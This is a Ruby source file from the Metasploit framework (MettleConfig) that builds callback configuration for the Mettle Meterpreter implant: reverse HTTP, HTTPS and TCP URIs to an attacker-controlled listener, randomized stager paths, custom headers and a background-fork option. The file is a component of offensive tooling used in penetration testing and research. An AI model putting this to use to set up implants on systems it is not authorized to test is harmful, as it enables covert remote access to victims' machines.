Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
# -*- coding: binary -*-
2

3
require 'base64'
4
require 'securerandom'
5

6
module Msf
7
  module Sessions
8
    module MettleConfig
9

10
      include Msf::Payload::TransportConfig
11

12
      def initialize(info = {})
13
        super
14

15
        register_advanced_options(
16
          [
17
            OptBool.new(
18
              'MeterpreterTryToFork',
19
              'Fork a new process if the functionality is available',
20
              default: false
21
            )
22
          ]
23
        )
24
      end
25

26
      def generate_uri(opts={})
27
        ds = opts[:datastore] || datastore
28
        uri_req_len = ds['StagerURILength'].to_i
29

30
        # Choose a random URI length between 30 and 128 bytes
31
        if uri_req_len == 0
32
          uri_req_len = 30 + luri.length + rand(127 - (30 + luri.length))
33
        end
34

35
        if uri_req_len < 5
36
          raise ArgumentError, "Minimum StagerURILength is 5"
37
        end
38

39
        generate_uri_uuid_mode(:init_connect, uri_req_len, uuid: opts[:uuid])
40
      end
41

42
      def generate_uri_option(opts, opt)
43
        opts[opt] ? "--#{opt} '#{opts[opt].gsub(/'/, "\\'")}' " : ''
44
      end
45

46
      def generate_http_uri(opts)
47
        if Rex::Socket.is_ipv6?(opts[:lhost])
48
          target_uri = "#{opts[:scheme]}://[#{opts[:lhost]}]"
49
        else
50
          target_uri = "#{opts[:scheme]}://#{opts[:lhost]}"
51
        end
52

53
        target_uri << ':'
54
        target_uri << opts[:lport].to_s
55
        target_uri << luri
56
        target_uri << generate_uri(opts)
57
        target_uri << '|'
58
        target_uri << generate_uri_option(opts, :ua)
59
        target_uri << generate_uri_option(opts, :host)
60
        target_uri << generate_uri_option(opts, :referer)
61
        if opts[:cookie]
62
          opts[:header] = "Cookie: #{opts[:cookie]}"
63
          target_uri << generate_uri_option(opts, :header)
64
        end
65
        target_uri.strip
66
      end
67

68
      def generate_tcp_uri(opts)
69
        if Rex::Socket.is_ipv6?(opts[:lhost])
70
          target_uri = "#{opts[:scheme]}://[#{opts[:lhost]}]"
71
        else
72
          target_uri = "#{opts[:scheme]}://#{opts[:lhost]}"
73
        end
74
        target_uri << ':'
75
        target_uri << opts[:lport].to_s
76
        target_uri
77
      end
78

79
      def generate_config(opts={})
80
        ds = opts[:datastore] || datastore
81

82
        opts[:background] = ds['MeterpreterTryToFork'] ? 1 : 0
83

84
        if ds['PayloadProcessCommandLine'] != ''
85
          opts[:name] ||= ds['PayloadProcessCommandLine']
86
        end
87

88
        opts[:uuid] ||= generate_payload_uuid
89

90
        case opts[:scheme]
91
        when 'http'
92
          opts[:uri] = generate_http_uri(transport_config_reverse_http(opts))
93
        when 'https'
94
          opts[:uri] = generate_http_uri(transport_config_reverse_https(opts))
95
        when 'tcp'
96
          opts[:uri] = generate_tcp_uri(transport_config_reverse_tcp(opts))
97
        else
98
          raise ArgumentError, "Unknown scheme: #{opts[:scheme]}"
99
        end
100

101
        opts[:uuid] = Base64.encode64(opts[:uuid].to_raw).strip
102
        guid = "\x00" * 16
103
        unless opts[:stageless] == true
104
          guid = [SecureRandom.uuid.gsub(/-/, '')].pack('H*')
105
        end
106
        opts[:session_guid] = Base64.encode64(guid).strip
107

108
        opts.slice(:uuid, :session_guid, :uri, :debug, :log_file, :name, :background)
109
      end
110

111
      # Stage encoding is not safe for Mettle (doesn't apply to stageless)
112
      def encode_stage?
113
        if datastore['EnableStageEncoding'] && !@warned
114
          print_warning("Stage encoding is not supported for #{refname}")
115
          @warned = true
116
        end
117

118
        false
119
      end
120

121
    end
122
  end
123
end
124

125